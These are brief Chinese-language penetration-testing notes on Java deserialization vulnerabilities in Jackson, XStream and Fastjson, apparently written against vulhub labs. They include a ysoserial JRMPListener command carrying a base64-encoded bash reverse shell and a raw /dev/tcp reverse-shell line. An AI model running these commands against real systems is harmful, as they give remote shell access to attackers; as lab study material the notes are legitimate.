CVE-java-jackson-xstream-fastjson #
jackson #
jackson CVE-2020-8840 #
JNDI
CVE-2020-35728 #
JNDI
Xstream #
Xstream 开源Java类库,能将对象序列化成XML或XML反序列化为对象
代码执行 (CVE-2021-21351) #
Xstream<=1.4.15
vulhub/xstream/CVE-2021-21351/README.zh-cn.md at master · vulhub/vulhub · GitHub
直接改变类型为xml
放入JNDI注入代码
反弹成功
CVE-2021-29505 #
vulhub/xstream/CVE-2021-29505/README.zh-cn.md at master · vulhub/vulhub · GitHub
XStream <= 1.4.16
你可以先测试下解析XML不 要看对方的代码逻辑
是看具体标签对不对还是格式对就行
<?xml version="1.0" encoding="UTF-8"?> <user> <name>Bob</name> <age>22</age> </user>
user是标签 里面是他的子标签
java -cp ysoserial-0.0.8-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1089 CommonsCollections6 “bash -c {echo,base64数据反弹命令}|{base64,-d}|{bash,-i}”
bash -i >& /dev/tcp/xx/xx 0>&1
测试有xml数据发送
本地监听一个1089端口 里面是CC链条的反弹SHELL命令
放入POC
反弹成功
这里工具使用ysoserial-all.jar 和 ysoserial-0.0.8-SNAPSHOT-all.jar都可以
FASTJSON #
fastjson到1.2.80 已经基本把本地链条封完了 只能通过外部链接 执行
vulhub/fastjson/1.2.24-rce/README.zh-cn.md at master · vulhub/vulhub · GitHub
1.2.40
这里是访问会返回JSON数据我们输入错误可以
创建成功
介绍两个推荐插件 右键发送
直接爆出利用代码 FastjsonScan
爆出版本FastjsonScan4Burp
